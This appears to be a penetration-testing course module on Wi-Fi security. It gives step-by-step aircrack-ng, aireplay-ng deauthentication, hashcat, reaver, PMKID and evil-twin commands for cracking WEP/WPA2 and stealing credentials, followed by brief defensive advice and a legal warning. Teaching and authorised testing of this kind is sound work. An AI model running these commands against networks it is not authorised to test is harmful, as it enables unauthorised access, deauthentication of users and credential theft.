Introduction to Wireless Security
Wireless networks (Wi-Fi) are vulnerable to various attacks due to weak encryption, misconfigurations, and physical accessibility. This guide covers **reconnaissance, exploitation, and defense** techniques for both **WEP, WPA/WPA2, and WPA3** networks.
1. Wireless Reconnaissance
A. Identifying Networks
- Scan for nearby networks:
bash
sudo iwconfig # List available interfaces
sudo airmon-ng start wlan0 # Enable monitor mode
sudo airodump-ng wlan0mon # Scan networks
Key details :
-BSSID (MAC address of AP)
- ESSID (Network name)
- Channel, Encryption (WEP/WPA/WPA2)
B. Target Selection
- Prioritize weak networks :
- WEP (Easily crackable)
- WPA/WPA2-PSK (Vulnerable to brute force)
- Open Wi-Fi (No encryption)
2. Wireless Attacks
A. WEP Cracking (Outdated but Still Found)
WEP uses RC4 encryption and is easily crackable due to IV (Initialization Vector) reuse.
Steps:
1. Capture packets:
bash
sudo airodump-ng -c <channel> --bssid <BSSID> -w wep_crack wlan0mon
2. Force IV generation (ARP replay attack):
bash
sudo aireplay-ng -3 -b <BSSID> -h <client_MAC> wlan0mon
3. Crack with aircrack-ng:
bash
sudo aircrack-ng wep_crack-01.cap
B. WPA/WPA2 Cracking
WPA/WPA2-PSK (Pre-Shared Key) is vulnerable to brute force/dictionary attacks.
Steps:
1. Capture WPA Handshake (4-way authentication):
bash
sudo airodump-ng -c <channel> --bssid <BSSID> -w handshake wlan0mon
2. Deauthenticate a client to force reconnection:
bash
sudo aireplay-ng -0 5 -a <BSSID> -c <client_MAC> wlan0mon
3. Crack with hashcat or aircrack-ng :
bash
aircrack-ng -w rockyou.txt handshake-01.cap
or
bash
hashcat -m 22000 handshake.hc22000 rockyou.txt
C. Evil Twin Attack (Rogue AP)
- Creates a fake Wi-Fi network to steal credentials.
Tools : airbase-ng , hostapd-wpe .
Steps:
1. Set up rogue AP:
bash
sudo airbase-ng -a <BSSID> --essid "Free_WiFi" -c <channel> wlan0mon
2. Redirect traffic:
bash
sudo dnschef -i <interface> --fakeip 192.168.1.1
3. Capture credentials when victims connect.
D. WPS (Wi-Fi Protected Setup) Attack
- WPS PIN brute force (if enabled).
Tools : reaver , bully.
Steps:
bash
sudo reaver -i wlan0mon -b <BSSID> -vv -K 1
E. KRACK Attack (Key Reinstallation Attack)
- Exploits WPA2's 4-way handshake vulnerability.
Tool : krackattacks-scripts .
Steps:
1. Monitor network traffic.
2. Forge handshake packets to intercept data.
3. Advanced Attacks
A. PMKID Attack (WPA/WPA2)
- Extracts PMKID (Pairwise Master Key ID) without handshake.
Tool : hcxdumptool , hashcat .
Steps:
1. Capture PMKID:
bash
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
2. Crack with hashcat :
bash
hashcat -m 16800 pmkid.hc16800 rockyou.txt
B. WPA3 Downgrade Attack
- Forces WPA3 → WPA2 fallback.
Tool : dragonblood .
4. Defensive Measures
A. Securing Wi-Fi Networks
✔ Use WPA3-SAE (if available)
✔ Disable WPS (Vulnerable to brute force)
✔ Use strong passwords (Avoid dictionary words)
✔ Enable MAC filtering (Whitelist devices)
✔ Disable SSID broadcasting (Hidden network)
✔ Monitor for rogue APs (Airodump-ng, Kismet)
B. Detection Tools
- Wireshark (Analyze Wi-Fi traffic)
- Kismet (Wireless IDS)
- Aircrack-ng (Test security)
5. Hands-On Lab
Lab: Cracking WPA2 with Aircrack-ng
1. Enable monitor mode :
bash
sudo airmon-ng start wlan0
2. Scan networks:
bash
sudo airodump-ng wlan0mon
3. Capture handshake :
bash
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon
4. Deauth a client :
bash
sudo aireplay-ng -0 5 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon
5. Crack the handshake :
bash
sudo aircrack-ng -w rockyou.txt capture-01.cap
6. Legal & Ethical Considerations
⚠ Only hack networks you own or have permission to test.
⚠ Unauthorized access is illegal (Computer Fraud and Abuse Act, etc.).
Conclusion
- WEP is trivial to crack (RC4 weakness).
- WPA/WPA2 is vulnerable to brute force (Weak passwords).
- WPA3 improves security but has downgrade risks.
- Evil Twin & WPS attacks are still effective.
🔹 Next Steps:
Module 9: Social Engineering & Phishing
- Try Wi-Fi challenges on Hack The Box / TryHackMe.
- Learn RF hacking (Bluetooth, Zigbee).
- Explore enterprise Wi-Fi security (RADIUS, 802.1X).
Would you like a step-by-step Evil Twin attack demo? 🚀
0 Comments